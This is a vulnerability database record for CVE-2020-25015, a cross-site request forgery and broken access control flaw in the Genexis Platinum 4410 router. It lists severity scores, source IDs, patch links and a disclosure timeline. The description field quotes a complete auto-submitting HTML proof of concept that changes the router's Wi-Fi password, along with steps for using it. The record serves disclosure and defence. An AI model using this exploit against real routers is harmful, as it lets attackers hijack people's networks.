            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.8,
            "id": "CVE-2020-25015",
            "impactScore": 3.6,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2020-25015",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-25015",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2020-25015",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-56086",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202009-1006",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-25015",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF\n# Date: 28-08-2020\n# Vendor Homepage: https://www.gxgroup.eu/ont-products/\n# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)\n# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\n# Version: v2.1 (software version P4410-V2-1.28)\n# CVE : CVE-2020-25015\n\n1. \n\n2. \n\n3. Proof of Concept\n\nCreate an HTML file with the following code:\n\n\u003chtml\u003e\n  \u003cbody\u003e\n  \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n    \u003cform action=\"http://192.168.1.1/cgi-bin/net-wlan.asp\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"wlEnbl\" value=\"ON\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlKeys0\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlKeys1\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlKeys2\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlKeys3\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlgMode\" value=\"9\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlAuthMode\" value=\"WPAPSKWPA2PSK\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlEnbl\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hWPSMode\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"henableSsid\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hwlHide\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"isInWPSing\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"WpsConfModeAll\" value=\"7\" /\u003e\n      \u003cinput type=\"hidden\" name=\"WpsConfModeNone\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"hWpsStart\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"isCUCSupport\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"SSIDPre\" value=\"N\u0026#47;A\" /\u003e\n      \u003cinput type=\"hidden\" name=\"bwControlhidden\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"ht\u0026#95;bw\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlgMode\" value=\"b\u0026#44;g\u0026#44;n\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlChannel\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlTxPwr\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlSsidIdx\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"SSID\u0026#95;Flag\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlSsid\" value=\"JINSON\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlMcs\" value=\"33\" /\u003e\n      \u003cinput type=\"hidden\" name=\"bwControl\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"giControl\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"enableSsid\" value=\"on\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlAssociateNum\" value=\"32\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlSecurMode\" value=\"WPAand11i\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlPreauth\" value=\"off\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlNetReauth\" value=\"1\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlWpaPsk\" value=\"NEWPASSWORD\" /\u003e\n      \u003cinput type=\"hidden\" name=\"cb\u0026#95;enablshowpsw\" value=\"on\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlWpaGtkRekey\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlRadiusIPAddr\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlRadiusPort\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlRadiusKey\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlWpa\" value=\"TKIPAES\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlKeyBit\" value=\"64\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"WpsActive\" value=\"0\" /\u003e\n      \u003cinput type=\"hidden\" name=\"wpsmode\" value=\"ap\u0026#45;pbc\" /\u003e\n      \u003cinput type=\"hidden\" name=\"pinvalue\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"Save\u0026#95;Flag\" value=\"1\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n     \u003cscript\u003e\n      document.forms[0].submit();\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\nOpen this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD\n\n\n4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk\u0026feature=emb_title\n\n3. Timeline\n\nVulnerability reported to the Genexis team \u2013 August 28, 2020\nTeam confirmed firmware release containing fix \u2013 September 14, 2020\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25015"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "db": "PACKETSTORM",
        "id": "159936"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25015",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "159936",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "49000",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-25015",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "PACKETSTORM",
        "id": "159936"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "id": "VAR-202009-0727",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      }
    ],
    "trust": 1.3232142850000002
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:51:19.096000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "https://www.gxgroup.eu/"
      },
      {
        "title": "Patch for Genexis Platinum cross-site request forgery vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/236092"
      },
      {
        "title": "Genexis Platinum Fixes for cross-site request forgery vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=128996"
      },
      {
        "title": "https://github.com/jinsonvarghese/jinsonvarghese",
        "trust": 0.1,
        "url": "https://github.com/jinsonvarghese/jinsonvarghese "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-352",
        "trust": 1.0
      },
      {
        "problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://packetstormsecurity.com/files/159936/genexis-platinum-4410-p4410-v2-1.28-missing-access-control-csrf.html"
      },
      {
        "trust": 2.6,
        "url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25015"
      },
      {
        "trust": 1.7,
        "url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/49000"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/352.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jinsonvarghese/jinsonvarghese"
      },
      {
        "trust": 0.1,
        "url": "https://www.gxgroup.eu/ont-products/"
      },
      {
        "trust": 0.1,
        "url": "https://www.youtube.com/watch?v=nsu5andh2rk\u0026feature=emb_title"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.1/cgi-bin/net-wlan.asp\""
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "PACKETSTORM",
        "id": "159936"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "db": "PACKETSTORM",
        "id": "159936"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-10-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "date": "2020-09-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "date": "2021-03-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "date": "2020-11-09T17:26:50",
        "db": "PACKETSTORM",
        "id": "159936"
      },
      {
        "date": "2020-09-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      },
      {
        "date": "2020-09-16T18:15:13.390000",
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-10-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "date": "2022-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-25015"
      },
      {
        "date": "2021-03-24T06:57:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-011232"
      },
      {
        "date": "2020-11-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      },
      {
        "date": "2024-11-21T05:16:31.130000",
        "db": "NVD",
        "id": "CVE-2020-25015"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Genexis Platinum cross-site request forgery vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-56086"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "cross-site request forgery",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202009-1006"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2020-25015 (GCVE-0-2020-25015)

Vulnerability from cvelistv5

ghsa-6gfp-9cvf-5g87

Vulnerability from github

fkie_cve-2020-25015

Vulnerability from fkie_nvd

gsd-2020-25015

Vulnerability from gsd

var-202009-0727

Vulnerability from variot

Date: 28-08-2020

Vendor Homepage: https://www.gxgroup.eu/ont-products/

Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)

Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/

Version: v2.1 (software version P4410-V2-1.28)

CVE : CVE-2020-25015

Tags

Sightings

Nomenclature